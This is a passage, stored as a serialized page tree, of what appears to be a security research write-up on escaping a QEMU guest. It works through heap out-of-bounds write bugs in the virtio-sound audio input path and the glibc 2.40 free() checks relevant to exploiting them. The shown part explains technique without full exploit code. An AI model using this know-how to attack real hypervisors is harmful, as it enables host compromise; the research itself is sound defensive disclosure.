children":132667},{"class":303,"line":652},[132668],{"type":24,"tag":301,"props":132669,"children":132670},{"style":1062},[132671],{"type":30,"value":132672}," /* the following are uint8_t, so there's no need to bswap the values. */\n",{"type":24,"tag":301,"props":132674,"children":132675},{"class":303,"line":666},[132676,132680,132684,132689,132693,132698,132702,132706],{"type":24,"tag":301,"props":132677,"children":132678},{"style":369},[132679],{"type":30,"value":132539},{"type":24,"tag":301,"props":132681,"children":132682},{"style":359},[132683],{"type":30,"value":882},{"type":24,"tag":301,"props":132685,"children":132686},{"style":369},[132687],{"type":30,"value":132688},"channels",{"type":24,"tag":301,"props":132690,"children":132691},{"style":385},[132692],{"type":30,"value":2537},{"type":24,"tag":301,"props":132694,"children":132695},{"style":369},[132696],{"type":30,"value":132697}," params",{"type":24,"tag":301,"props":132699,"children":132700},{"style":359},[132701],{"type":30,"value":882},{"type":24,"tag":301,"props":132703,"children":132704},{"style":369},[132705],{"type":30,"value":132688},{"type":24,"tag":301,"props":132707,"children":132708},{"style":359},[132709],{"type":30,"value":492},{"type":24,"tag":301,"props":132711,"children":132712},{"class":303,"line":674},[132713,132717,132721,132726,132730,132734,132738,132742],{"type":24,"tag":301,"props":132714,"children":132715},{"style":369},[132716],{"type":30,"value":132539},{"type":24,"tag":301,"props":132718,"children":132719},{"style":359},[132720],{"type":30,"value":882},{"type":24,"tag":301,"props":132722,"children":132723},{"style":369},[132724],{"type":30,"value":132725},"format",{"type":24,"tag":301,"props":132727,"children":132728},{"style":385},[132729],{"type":30,"value":2537},{"type":24,"tag":301,"props":132731,"children":132732},{"style":369},[132733],{"type":30,"value":132697},{"type":24,"tag":301,"props":132735,"children":132736},{"style":359},[132737],{"type":30,"value":882},{"type":24,"tag":301,"props":132739,"children":132740},{"style":369},[132741],{"type":30,"value":132725},{"type":24,"tag":301,"props":132743,"children":132744},{"style":359},[132745],{"type":30,"value":492},{"type":24,"tag":301,"props":132747,"children":132748},{"class":303,"line":692},[132749,132753,132757,132762,132766,132770,132774,132778],{"type":24,"tag":301,"props":132750,"children":132751},{"style":369},[132752],{"type":30,"value":132539},{"type":24,"tag":301,"props":132754,"children":132755},{"style":359},[132756],{"type":30,"value":882},{"type":24,"tag":301,"props":132758,"children":132759},{"style":369},[132760],{"type":30,"value":132761},"rate",{"type":24,"tag":301,"props":132763,"children":132764},{"style":385},[132765],{"type":30,"value":2537},{"type":24,"tag":301,"props":132767,"children":132768},{"style":369},[132769],{"type":30,"value":132697},{"type":24,"tag":301,"props":132771,"children":132772},{"style":359},[132773],{"type":30,"value":882},{"type":24,"tag":301,"props":132775,"children":132776},{"style":369},[132777],{"type":30,"value":132761},{"type":24,"tag":301,"props":132779,"children":132780},{"style":359},[132781],{"type":30,"value":492},{"type":24,"tag":301,"props":132783,"children":132784},{"class":303,"line":3631},[132785],{"type":24,"tag":301,"props":132786,"children":132787},{"emptyLinePlaceholder":16},[132788],{"type":30,"value":341},{"type":24,"tag":301,"props":132790,"children":132791},{"class":303,"line":3639},[132792,132796,132801],{"type":24,"tag":301,"props":132793,"children":132794},{"style":308},[132795],{"type":30,"value":680},{"type":24,"tag":301,"props":132797,"children":132798},{"style":314},[132799],{"type":30,"value":132800}," cpu_to_le32",{"type":24,"tag":301,"props":132802,"children":132803},{"style":359},[132804],{"type":30,"value":132805},"(VIRTIO_SND_S_OK);\n",{"type":24,"tag":301,"props":132807,"children":132808},{"class":303,"line":3647},[132809],{"type":24,"tag":301,"props":132810,"children":132811},{"style":359},[132812],{"type":30,"value":698},{"type":24,"tag":32,"props":132814,"children":132815},{},[132816,132818,132823,132825,132831,132833,132838,132840,132845,132847,132853,132854,132859],{"type":30,"value":132817},"Among the guest-controlled PCM parameters, format matters later for exploit reliability. For 8-bit PCM, QEMU accepts both unsigned (",{"type":24,"tag":145,"props":132819,"children":132821},{"className":132820},[],[132822],{"type":30,"value":10249},{"type":30,"value":132824},") and signed (",{"type":24,"tag":145,"props":132826,"children":132828},{"className":132827},[],[132829],{"type":30,"value":132830},"s8",{"type":30,"value":132832},") samples. They encode the same waveform differently - silence is ",{"type":24,"tag":145,"props":132834,"children":132836},{"className":132835},[],[132837],{"type":30,"value":36196},{"type":30,"value":132839}," in ",{"type":24,"tag":145,"props":132841,"children":132843},{"className":132842},[],[132844],{"type":30,"value":10249},{"type":30,"value":132846},", but ",{"type":24,"tag":145,"props":132848,"children":132850},{"className":132849},[],[132851],{"type":30,"value":132852},"0x00",{"type":30,"value":132839},{"type":24,"tag":145,"props":132855,"children":132857},{"className":132856},[],[132858],{"type":30,"value":132830},{"type":30,"value":206},{"type":24,"tag":2719,"props":132861,"children":132862},{},[],{"type":24,"tag":32,"props":132864,"children":132865},{},[132866],{"type":30,"value":132867},"To summarize:",{"type":24,"tag":6246,"props":132869,"children":132870},{},[132871,132890,132908],{"type":24,"tag":2659,"props":132872,"children":132873},{},[132874,132876,132881,132883,132888],{"type":30,"value":132875},"an integer underflow in the ",{"type":24,"tag":145,"props":132877,"children":132879},{"className":132878},[],[132880],{"type":30,"value":3219},{"type":30,"value":132882}," calculation in ",{"type":24,"tag":145,"props":132884,"children":132886},{"className":132885},[],[132887],{"type":30,"value":130455},{"type":30,"value":132889},", resulting in an 8-byte (or less) under-allocation",{"type":24,"tag":2659,"props":132891,"children":132892},{},[132893,132895,132900,132901,132906],{"type":30,"value":132894},"a mismatch in the ",{"type":24,"tag":145,"props":132896,"children":132898},{"className":132897},[],[132899],{"type":30,"value":132178},{"type":30,"value":132882},{"type":24,"tag":145,"props":132902,"children":132904},{"className":132903},[],[132905],{"type":30,"value":132275},{"type":30,"value":132907},", leading to at most 8-byte OOB write",{"type":24,"tag":2659,"props":132909,"children":132910},{},[132911,132913,132918,132920,132925,132927,132932],{"type":30,"value":132912},"a missing bound in the ",{"type":24,"tag":145,"props":132914,"children":132916},{"className":132915},[],[132917],{"type":30,"value":3219},{"type":30,"value":132919}," passed to ",{"type":24,"tag":145,"props":132921,"children":132923},{"className":132922},[],[132924],{"type":30,"value":132295},{"type":30,"value":132926},", which does not take the actual buffer allocation size into account and can therefore lead to an OOB write of an arbitrary length, up to ",{"type":24,"tag":145,"props":132928,"children":132930},{"className":132929},[],[132931],{"type":30,"value":132318},{"type":30,"value":88994},{"type":24,"tag":32,"props":132934,"children":132935},{},[132936,132938,132943,132945,132950,132952,132958],{"type":30,"value":132937},"In our exploit, we focus on the third bug because it provides the largest overflow and therefore the most useful primitive. In practice, the actual write is still bounded by ",{"type":24,"tag":145,"props":132939,"children":132941},{"className":132940},[],[132942],{"type":30,"value":132318},{"type":30,"value":132944},", but in our setup with the ALSA backend, ",{"type":24,"tag":145,"props":132946,"children":132948},{"className":132947},[],[132949],{"type":30,"value":132318},{"type":30,"value":132951}," was consistently around ",{"type":24,"tag":145,"props":132953,"children":132955},{"className":132954},[],[132956],{"type":30,"value":132957},"4096",{"type":30,"value":206},{"type":24,"tag":32,"props":132960,"children":132961},{},[132962,132964,132971,132972,132979],{"type":30,"value":132963},"It is also worth noting that the timing here was particularly unlucky - these bugs had been present in QEMU for over two years, but they were fixed (",{"type":24,"tag":188,"props":132965,"children":132968},{"href":132966,"rel":132967},"https://github.com/qemu/qemu/commit/bcb53328aa70023f1405fade4e253e7f77567261",[192],[132969],{"type":30,"value":132970},"commit 1",{"type":30,"value":377},{"type":24,"tag":188,"props":132973,"children":132976},{"href":132974,"rel":132975},"https://github.com/qemu/qemu/commit/7994203bb1b83a6604f3ab00fe9598909bb66164",[192],[132977],{"type":30,"value":132978},"commit 2",{"type":30,"value":132980},") in the very same week that we independently found them while manually reviewing the code.",{"type":24,"tag":43,"props":132982,"children":132983},{"id":106804},[132984],{"type":30,"value":106807},{"type":24,"tag":32,"props":132986,"children":132987},{},[132988],{"type":30,"value":132989},"Each of these bugs is in the audio input path. Since that audio input comes from the host side, the bytes written out of bounds are not controlled by the guest and, from the exploit perspective, can be treated as effectively random.",{"type":24,"tag":32,"props":132991,"children":132992},{},[132993],{"type":30,"value":132994},"This gives an interesting challenge: how do you exploit an out-of-bounds write when you do not control the data being written?",{"type":24,"tag":80,"props":132996,"children":132998},{"id":132997},"achieving-a-better-primitive",[132999],{"type":30,"value":133000},"Achieving a Better Primitive",{"type":24,"tag":32,"props":133002,"children":133003},{},[133004],{"type":30,"value":133005},"The first idea that comes to mind is to target some kind of size or offset field. The goal is to make that field as small as possible initially, trigger the overflow, and rely on the corrupted bytes being larger than the original value. Such scenario would transform a weak primitive into a much more useful one, giving us a better starting point for the rest of the exploit.",{"type":24,"tag":32,"props":133007,"children":133008},{},[133009],{"type":30,"value":133010},"However, after searching QEMU for such objects we didn't find a suitable target. The main problem was that, in most cases, the field we wanted to corrupt was preceded by one or more pointers. That would have been acceptable if those pointers were unused, but in every candidate object we examined they were still live. As a result, the heap overflow would corrupt them with effectively random bytes, causing an invalid dereference and crashing QEMU before we could achieve our desired guest-to-host escape.",{"type":24,"tag":32,"props":133012,"children":133013},{},[133014],{"type":30,"value":133015},"At that point, we turned our attention to the glibc allocator. This is usually not the first choice in such targets - allocator techniques are often more version-specific and less portable than program-specific primitives (for example, type confusion on known object layouts). So allocator attacks are often a fallback once object-level paths are exhausted.",{"type":24,"tag":270,"props":133017,"children":133019},{"id":133018},"glibc-allocator",[133020],{"type":30,"value":133021},"Glibc Allocator",{"type":24,"tag":32,"props":133023,"children":133024},{},[133025,133027,133034],{"type":30,"value":133026},"The glibc allocator has already been studied and documented extensively, so we will only cover the basics relevant to this exploit. A good resource for both current and older attack techniques is ",{"type":24,"tag":188,"props":133028,"children":133031},{"href":133029,"rel":133030},"https://github.com/shellphish/how2heap",[192],[133032],{"type":30,"value":133033},"how2heap",{"type":30,"value":206},{"type":24,"tag":44086,"props":133036,"children":133038},{"id":133037},"chunk-layout-and-bins",[133039],{"type":30,"value":133040},"Chunk Layout and Bins",{"type":24,"tag":32,"props":133042,"children":133043},{},[133044],{"type":30,"value":133045},"A chunk looks like this:",{"type":24,"tag":291,"props":133047,"children":133049},{"code":133048}," +0x0 +0x8\n +-------------+-------------+\n | prev_size | size |\n +---------------------------+\n+0x10 | 41 41 41 41 41 41 41 41 |\n | |\n | 41 41 41 41 41 41 41 41 |\n | |\n | . . . |\n",[133050],{"type":24,"tag":145,"props":133051,"children":133052},{"__ignoreMap":7},[133053],{"type":30,"value":133048},{"type":24,"tag":32,"props":133055,"children":133056},{},[133057,133059,133065,133067,133073,133074,133079,133080,133086,133088,133093,133095,133100,133102,133108,133109,133115,133117,133122],{"type":30,"value":133058},"The first 16 bytes form the chunk header. It consists of the ",{"type":24,"tag":145,"props":133060,"children":133062},{"className":133061},[],[133063],{"type":30,"value":133064},"prev_size",{"type":30,"value":133066}," field at offset ",{"type":24,"tag":145,"props":133068,"children":133070},{"className":133069},[],[133071],{"type":30,"value":133072},"0x0",{"type":30,"value":44289},{"type":24,"tag":145,"props":133075,"children":133077},{"className":133076},[],[133078],{"type":30,"value":3219},{"type":30,"value":133066},{"type":24,"tag":145,"props":133081,"children":133083},{"className":133082},[],[133084],{"type":30,"value":133085},"0x8",{"type":30,"value":133087},". As the name suggests, ",{"type":24,"tag":145,"props":133089,"children":133091},{"className":133090},[],[133092],{"type":30,"value":133064},{"type":30,"value":133094}," stores the size of the previous chunk and is only used when that chunk is free, while ",{"type":24,"tag":145,"props":133096,"children":133098},{"className":133097},[],[133099],{"type":30,"value":3219},{"type":30,"value":133101}," stores the size of the current chunk and three special bits of which ",{"type":24,"tag":145,"props":133103,"children":133105},{"className":133104},[],[133106],{"type":30,"value":133107},"PREV_INUSE",{"type":30,"value":2378},{"type":24,"tag":145,"props":133110,"children":133112},{"className":133111},[],[133113],{"type":30,"value":133114},"IS_MMAPPED",{"type":30,"value":133116}," are relevant for this blog post. The actual chunk data begins at offset ",{"type":24,"tag":145,"props":133118,"children":133120},{"className":133119},[],[133121],{"type":30,"value":5264},{"type":30,"value":206},{"type":24,"tag":32,"props":133124,"children":133125},{},[133126],{"type":30,"value":133127},"Freed chunks are organized into different bins depending on their size and state. For this writeup, the important one is the per-thread cache, or tcache. Tcache stores recently freed chunks in size-segregated singly linked lists and is generally the first place glibc looks when servicing small allocations.",{"type":24,"tag":44086,"props":133129,"children":133131},{"id":133130},"free-path",[133132],{"type":30,"value":133133},"free() path",{"type":24,"tag":32,"props":133135,"children":133136},{},[133137,133139,133144],{"type":30,"value":133138},"Let’s first look at the ",{"type":24,"tag":145,"props":133140,"children":133142},{"className":133141},[],[133143],{"type":30,"value":5369},{"type":30,"value":133145}," path in glibc 2.40:",{"type":24,"tag":291,"props":133147,"children":133149},{"code":133148,"language":294,"meta":7,"className":295,"style":7},"__libc_free (void *mem)\n{\n mstate ar_ptr;\n mchunkptr p;\n\n p = mem2chunk (mem);\n if (chunk_is_mmapped (p))\n {\n munmap_chunk (p);\n }\n else\n {\n MAYBE_INIT_TCACHE ();\n\n ar_ptr = arena_for_chunk (p);\n _int_free (ar_ptr, p, 0);\n }\n}\n",[133150],{"type":24,"tag":145,"props":133151,"children":133152},{"__ignoreMap":7},[133153,133181,133188,133196,133204,133211,133233,133254,133261,133274,133281,133289,133296,133309,133316,133337,133358,133365],{"type":24,"tag":301,"props":133154,"children":133155},{"class":303,"line":304},[133156,133161,133165,133169,133173,133177],{"type":24,"tag":301,"props":133157,"children":133158},{"style":314},[133159],{"type":30,"value":133160},"__libc_free",{"type":24,"tag":301,"props":133162,"children":133163},{"style":359},[133164],{"type":30,"value":873},{"type":24,"tag":301,"props":133166,"children":133167},{"style":348},[133168],{"type":30,"value":58352},{"type":24,"tag":301,"props":133170,"children":133171},{"style":385},[133172],{"type":30,"value":431},{"type":24,"tag":301,"props":133174,"children":133175},{"style":369},[133176],{"type":30,"value":47400},{"type":24,"tag":301,"props":133178,"children":133179},{"style":359},[133180],{"type":30,"value":791},{"type":24,"tag":301,"props":133182,"children":133183},{"class":303,"line":320},[133184],{"type":24,"tag":301,"props":133185,"children":133186},{"style":359},[133187],{"type":30,"value":799},{"type":24,"tag":301,"props":133189,"children":133190},{"class":303,"line":335},[133191],{"type":24,"tag":301,"props":133192,"children":133193},{"style":359},[133194],{"type":30,"value":133195}," mstate ar_ptr;\n",{"type":24,"tag":301,"props":133197,"children":133198},{"class":303,"line":344},[133199],{"type":24,"tag":301,"props":133200,"children":133201},{"style":359},[133202],{"type":30,"value":133203}," mchunkptr p;\n",{"type":24,"tag":301,"props":133205,"children":133206},{"class":303,"line":401},[133207],{"type":24,"tag":301,"props":133208,"children":133209},{"emptyLinePlaceholder":16},[133210],{"type":30,"value":341},{"type":24,"tag":301,"props":133212,"children":133213},{"class":303,"line":415},[133214,133219,133223,133228],{"type":24,"tag":301,"props":133215,"children":133216},{"style":359},[133217],{"type":30,"value":133218}," p ",{"type":24,"tag":301,"props":133220,"children":133221},{"style":385},[133222],{"type":30,"value":523},{"type":24,"tag":301,"props":133224,"children":133225},{"style":314},[133226],{"type":30,"value":133227}," mem2chunk",{"type":24,"tag":301,"props":133229,"children":133230},{"style":359},[133231],{"type":30,"value":133232}," (mem);\n",{"type":24,"tag":301,"props":133234,"children":133235},{"class":303,"line":439},[133236,133240,133244,133249],{"type":24,"tag":301,"props":133237,"children":133238},{"style":308},[133239],{"type":30,"value":38149},{"type":24,"tag":301,"props":133241,"children":133242},{"style":359},[133243],{"type":30,"value":873},{"type":24,"tag":301,"props":133245,"children":133246},{"style":314},[133247],{"type":30,"value":133248},"chunk_is_mmapped",{"type":24,"tag":301,"props":133250,"children":133251},{"style":359},[133252],{"type":30,"value":133253}," (p))\n",{"type":24,"tag":301,"props":133255,"children":133256},{"class":303,"line":447},[133257],{"type":24,"tag":301,"props":133258,"children":133259},{"style":359},[133260],{"type":30,"value":35943},{"type":24,"tag":301,"props":133262,"children":133263},{"class":303,"line":476},[133264,133269],{"type":24,"tag":301,"props":133265,"children":133266},{"style":314},[133267],{"type":30,"value":133268}," munmap_chunk",{"type":24,"tag":301,"props":133270,"children":133271},{"style":359},[133272],{"type":30,"value":133273}," (p);\n",{"type":24,"tag":301,"props":133275,"children":133276},{"class":303,"line":495},[133277],{"type":24,"tag":301,"props":133278,"children":133279},{"style":359},[133280],{"type":30,"value":501},{"type":24,"tag":301,"props":133282,"children":133283},{"class":303,"line":504},[133284],{"type":24,"tag":301,"props":133285,"children":133286},{"style":308},[133287],{"type":30,"value":133288}," else\n",{"type":24,"tag":301,"props":133290,"children":133291},{"class":303,"line":512},[133292],{"type":24,"tag":301,"props":133293,"children":133294},{"style":359},[133295],{"type":30,"value":35943},{"type":24,"tag":301,"props":133297,"children":133298},{"class":303,"line":592},[133299,133304],{"type":24,"tag":301,"props":133300,"children":133301},{"style":314},[133302],{"type":30,"value":133303}," MAYBE_INIT_TCACHE",{"type":24,"tag":301,"props":133305,"children":133306},{"style":359},[133307],{"type":30,"value":133308}," ();\n",{"type":24,"tag":301,"props":133310,"children":133311},{"class":303,"line":619},[133312],{"type":24,"tag":301,"props":133313,"children":133314},{"emptyLinePlaceholder":16},[133315],{"type":30,"value":341},{"type":24,"tag":301,"props":133317,"children":133318},{"class":303,"line":635},[133319,133324,133328,133333],{"type":24,"tag":301,"props":133320,"children":133321},{"style":359},[133322],{"type":30,"value":133323}," ar_ptr ",{"type":24,"tag":301,"props":133325,"children":133326},{"style":385},[133327],{"type":30,"value":523},{"type":24,"tag":301,"props":133329,"children":133330},{"style":314},[133331],{"type":30,"value":133332}," arena_for_chunk",{"type":24,"tag":301,"props":133334,"children":133335},{"style":359},[133336],{"type":30,"value":133273},{"type":24,"tag":301,"props":133338,"children":133339},{"class":303,"line":643},[133340,133345,133350,133354],{"type":24,"tag":301,"props":133341,"children":133342},{"style":314},[133343],{"type":30,"value":133344}," _int_free",{"type":24,"tag":301,"props":133346,"children":133347},{"style":359},[133348],{"type":30,"value":133349}," (ar_ptr, p, ",{"type":24,"tag":301,"props":133351,"children":133352},{"style":466},[133353],{"type":30,"value":584},{"type":24,"tag":301,"props":133355,"children":133356},{"style":359},[133357],{"type":30,"value":589},{"type":24,"tag":301,"props":133359,"children":133360},{"class":303,"line":652},[133361],{"type":24,"tag":301,"props":133362,"children":133363},{"style":359},[133364],{"type":30,"value":501},{"type":24,"tag":301,"props":133366,"children":133367},{"class":303,"line":666},[133368],{"type":24,"tag":301,"props":133369,"children":133370},{"style":359},[133371],{"type":30,"value":698},{"type":24,"tag":32,"props":133373,"children":133374},{},[133375,133377,133382,133384,133389,133391,133397,133399,133405,133407,133412,133414,133419,133421,133426,133428,133433],{"type":30,"value":133376},"We can see that if the ",{"type":24,"tag":145,"props":133378,"children":133380},{"className":133379},[],[133381],{"type":30,"value":133114},{"type":30,"value":133383}," bit is set in the corrupted ",{"type":24,"tag":145,"props":133385,"children":133387},{"className":133386},[],[133388],{"type":30,"value":3219},{"type":30,"value":133390}," field, glibc will call ",{"type":24,"tag":145,"props":133392,"children":133394},{"className":133393},[],[133395],{"type":30,"value":133396},"munmap_chunk",{"type":30,"value":133398},", which internally checks that ",{"type":24,"tag":145,"props":133400,"children":133402},{"className":133401},[],[133403],{"type":30,"value":133404},"prev_size + size",{"type":30,"value":133406}," is page-aligned. To reach the ",{"type":24,"tag":145,"props":133408,"children":133410},{"className":133409},[],[133411],{"type":30,"value":3219},{"type":30,"value":133413}," field, we first have to overwrite the entire 8-byte ",{"type":24,"tag":145,"props":133415,"children":133417},{"className":133416},[],[133418],{"type":30,"value":133064},{"type":30,"value":133420}," field with uncontrolled data. The chance that a corrupted ",{"type":24,"tag":145,"props":133422,"children":133424},{"className":133423},[],[133425],{"type":30,"value":133404},{"type":30,"value":133427}," value still ends up page-aligned is extremely small. In practice, if ",{"type":24,"tag":145,"props":133429,"children":133431},{"className":133430},[],[133432],{"type":30,"value":133114},{"type":30,"value":133434}," is set, the process will almost certainly abort before we can make use of the corruption.",{"type":24,"tag":32,"props":133436,"children":133437},{},[133438,133440,133445,133447,133453],{"type":30,"value":133439},"Assuming ",{"type":24,"tag":145,"props":133441,"children":133443},{"className":133442},[],[133444],{"type":30,"value":133114},{"type":30,"value":133446}," is not set, execution continues into ",{"type":24,"tag":145,"props":133448,"children":133450},{"className":133449},[],[133451],{"type":30,"value":133452},"_int_free",{"type":30,"value":1679},{"type":24,"tag":291,"props":133455,"children":133457},{"code":133456,"language":294,"meta":7,"className":295,"style":7},"static void\n_int_free (mstate av, mchunkptr p, int have_lock)\n{\n INTERNAL_SIZE_T size;\n\n size = chunksize (p);\n\n /* Little security check which won't hurt performance: the\n allocator never wraps around at the end of the address space.\n Therefore we can exclude some size values which might appear\n here by accident or by \"design\" from some intruder. */\n if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)\n || __builtin_expect (misaligned_chunk (p), 0))\n malloc_printerr (\"free(): invalid pointer\");\n /* We know that each chunk is at least MINSIZE bytes in size or a\n multiple of MALLOC_ALIGNMENT. */\n if (__glibc_unlikely (size \u003C MINSIZE || !aligned_OK (size)))\n malloc_printerr (\"free(): invalid size\");\n\n check_inuse_chunk(av, p);\n\n [...]\n",[133458],{"type":24,"tag":145,"props":133459,"children":133460},{"__ignoreMap":7},[133461,133473,133516,133523,133531,133538,133559,133566,133574,133582,133590,133598,133662,133697,133718,133726,133734,133782,133802,133809,133822,133829],{"type":24,"tag":301,"props":133462,"children":133463},{"class":303,"line":304},[133464,133468],{"type":24,"tag":301,"props":133465,"children":133466},{"style":348},[133467],{"type":30,"value":752},{"type":24,"tag":301,"props":133469,"children":133470},{"style":348},[133471],{"type":30,"value":133472}," void\n",{"type":24,"tag":301,"props":133474,"children":133475},{"class":303,"line":320},[133476,133480,133485,133490,133495,133499,133503,133507,133512],{"type":24,"tag":301,"props":133477,"children":133478},{"style":314},[133479],{"type":30,"value":133452},{"type":24,"tag":301,"props":133481,"children":133482},{"style":359},[133483],{"type":30,"value":133484}," (mstate ",{"type":24,"tag":301,"props":133486,"children":133487},{"style":369},[133488],{"type":30,"value":133489},"av",{"type":24,"tag":301,"props":133491,"children":133492},{"style":359},[133493],{"type":30,"value":133494},", mchunkptr ",{"type":24,"tag":301,"props":133496,"children":133497},{"style":369},[133498],{"type":30,"value":32},{"type":24,"tag":301,"props":133500,"children":133501},{"style":359},[133502],{"type":30,"value":377},{"type":24,"tag":301,"props":133504,"children":133505},{"style":348},[133506],{"type":30,"value":351},{"type":24,"tag":301,"props":133508,"children":133509},{"style":369},[133510],{"type":30,"value":133511}," have_lock",{"type":24,"tag":301,"props":133513,"children":133514},{"style":359},[133515],{"type":30,"value":791},{"type":24,"tag":301,"props":133517,"children":133518},{"class":303,"line":335},[133519],{"type":24,"tag":301,"props":133520,"children":133521},{"style":359},[133522],{"type":30,"value":799},{"type":24,"tag":301,"props":133524,"children":133525},{"class":303,"line":344},[133526],{"type":24,"tag":301,"props":133527,"children":133528},{"style":359},[133529],{"type":30,"value":133530}," INTERNAL_SIZE_T size;\n",{"type":24,"tag":301,"props":133532,"children":133533},{"class":303,"line":401},[133534],{"type":24,"tag":301,"props":133535,"children":133536},{"emptyLinePlaceholder":16},[133537],{"type":30,"value":341},{"type":24,"tag":301,"props":133539,"children":133540},{"class":303,"line":415},[133541,133546,133550,133555],{"type":24,"tag":301,"props":133542,"children":133543},{"style":359},[133544],{"type":30,"value":133545}," size ",{"type":24,"tag":301,"props":133547,"children":133548},{"style":385},[133549],{"type":30,"value":523},{"type":24,"tag":301,"props":133551,"children":133552},{"style":314},[133553],{"type":30,"value":133554}," chunksize",{"type":24,"tag":301,"props":133556,"children":133557},{"style":359},[133558],{"type":30,"value":133273},{"type":24,"tag":301,"props":133560,"children":133561},{"class":303,"line":439},[133562],{"type":24,"tag":301,"props":133563,"children":133564},{"emptyLinePlaceholder":16},[133565],{"type":30,"value":341},{"type":24,"tag":301,"props":133567,"children":133568},{"class":303,"line":447},[133569],{"type":24,"tag":301,"props":133570,"children":133571},{"style":1062},[133572],{"type":30,"value":133573}," /* Little security check which won't hurt performance: the\n",{"type":24,"tag":301,"props":133575,"children":133576},{"class":303,"line":476},[133577],{"type":24,"tag":301,"props":133578,"children":133579},{"style":1062},[133580],{"type":30,"value":133581}," allocator never wraps around at the end of the address space.\n",{"type":24,"tag":301,"props":133583,"children":133584},{"class":303,"line":495},[133585],{"type":24,"tag":301,"props":133586,"children":133587},{"style":1062},[133588],{"type":30,"value":133589}," Therefore we can exclude some size values which might appear\n",{"type":24,"tag":301,"props":133591,"children":133592},{"class":303,"line":504},[133593],{"type":24,"tag":301,"props":133594,"children":133595},{"style":1062},[133596],{"type":30,"value":133597}," here by accident or by \"design\" from some intruder. */\n",{"type":24,"tag":301,"props":133599,"children":133600},{"class":303,"line":512},[133601,133605,133609,133614,133619,133624,133629,133633,133637,133641,133645,133649,133654,133658],{"type":24,"tag":301,"props":133602,"children":133603},{"style":308},[133604],{"type":30,"value":38149},{"type":24,"tag":301,"props":133606,"children":133607},{"style":359},[133608],{"type":30,"value":873},{"type":24,"tag":301,"props":133610,"children":133611},{"style":314},[133612],{"type":30,"value":133613},"__builtin_expect",{"type":24,"tag":301,"props":133615,"children":133616},{"style":359},[133617],{"type":30,"value":133618}," ((",{"type":24,"tag":301,"props":133620,"children":133621},{"style":348},[133622],{"type":30,"value":133623},"uintptr_t",{"type":24,"tag":301,"props":133625,"children":133626},{"style":359},[133627],{"type":30,"value":133628},") p ",{"type":24,"tag":301,"props":133630,"children":133631},{"style":385},[133632],{"type":30,"value":1456},{"type":24,"tag":301,"props":133634,"children":133635},{"style":359},[133636],{"type":30,"value":873},{"type":24,"tag":301,"props":133638,"children":133639},{"style":348},[133640],{"type":30,"value":133623},{"type":24,"tag":301,"props":133642,"children":133643},{"style":359},[133644],{"type":30,"value":911},{"type":24,"tag":301,"props":133646,"children":133647},{"style":385},[133648],{"type":30,"value":9253},{"type":24,"tag":301,"props":133650,"children":133651},{"style":359},[133652],{"type":30,"value":133653},"size, ",{"type":24,"tag":301,"props":133655,"children":133656},{"style":466},[133657],{"type":30,"value":584},{"type":24,"tag":301,"props":133659,"children":133660},{"style":359},[133661],{"type":30,"value":791},{"type":24,"tag":301,"props":133663,"children":133664},{"class":303,"line":592},[133665,133670,133675,133679,133684,133689,133693],{"type":24,"tag":301,"props":133666,"children":133667},{"style":385},[133668],{"type":30,"value":133669}," ||",{"type":24,"tag":301,"props":133671,"children":133672},{"style":314},[133673],{"type":30,"value":133674}," __builtin_expect",{"type":24,"tag":301,"props":133676,"children":133677},{"style":359},[133678],{"type":30,"value":873},{"type":24,"tag":301,"props":133680,"children":133681},{"style":314},[133682],{"type":30,"value":133683},"misaligned_chunk",{"type":24,"tag":301,"props":133685,"children":133686},{"style":359},[133687],{"type":30,"value":133688}," (p), ",{"type":24,"tag":301,"props":133690,"children":133691},{"style":466},[133692],{"type":30,"value":584},{"type":24,"tag":301,"props":133694,"children":133695},{"style":359},[133696],{"type":30,"value":9381},{"type":24,"tag":301,"props":133698,"children":133699},{"class":303,"line":619},[133700,133705,133709,133714],{"type":24,"tag":301,"props":133701,"children":133702},{"style":314},[133703],{"type":30,"value":133704}," malloc_printerr",{"type":24,"tag":301,"props":133706,"children":133707},{"style":359},[133708],{"type":30,"value":873},{"type":24,"tag":301,"props":133710,"children":133711},{"style":329},[133712],{"type":30,"value":133713},"\"free(): invalid pointer\"",{"type":24,"tag":301,"props":133715,"children":133716},{"style":359},[133717],{"type":30,"value":589},{"type":24,"tag":301,"props":133719,"children":133720},{"class":303,"line":635},[133721],{"type":24,"tag":301,"props":133722,"children":133723},{"style":1062},[133724],{"type":30,"value":133725}," /* We know that each chunk is at least MINSIZE bytes in size or a\n",{"type":24,"tag":301,"props":133727,"children":133728},{"class":303,"line":643},[133729],{"type":24,"tag":301,"props":133730,"children":133731},{"style":1062},[133732],{"type":30,"value":133733}," multiple of MALLOC_ALIGNMENT. */\n",{"type":24,"tag":301,"props":133735,"children":133736},{"class":303,"line":652},[133737,133741,133745,133750,133755,133759,133764,133768,133772,133777],{"type":24,"tag":301,"props":133738,"children":133739},{"style":308},[133740],{"type":30,"value":38149},{"type":24,"tag":301,"props":133742,"children":133743},{"style":359},[133744],{"type":30,"value":873},{"type":24,"tag":301,"props":133746,"children":133747},{"style":314},[133748],{"type":30,"value":133749},"__glibc_unlikely",{"type":24,"tag":301,"props":133751,"children":133752},{"style":359},[133753],{"type":30,"value":133754}," (size ",{"type":24,"tag":301,"props":133756,"children":133757},{"style":385},[133758],{"type":30,"value":1849},{"type":24,"tag":301,"props":133760,"children":133761},{"style":359},[133762],{"type":30,"value":133763}," MINSIZE ",{"type":24,"tag":301,"props":133765,"children":133766},{"style":385},[133767],{"type":30,"value":5632},{"type":24,"tag":301,"props":133769,"children":133770},{"style":385},[133771],{"type":30,"value":19659},{"type":24,"tag":301,"props":133773,"children":133774},{"style":314},[133775],{"type":30,"value":133776},"aligned_OK",{"type":24,"tag":301,"props":133778,"children":133779},{"style":359},[133780],{"type":30,"value":133781}," (size)))\n",{"type":24,"tag":301,"props":133783,"children":133784},{"class":303,"line":666},[133785,133789,133793,133798],{"type":24,"tag":301,"props":133786,"children":133787},{"style":314},[133788],{"type":30,"value":133704},{"type":24,"tag":301,"props":133790,"children":133791},{"style":359},[133792],{"type":30,"value":873},{"type":24,"tag":301,"props":133794,"children":133795},{"style":329},[133796],{"type":30,"value":133797},"\"free(): invalid 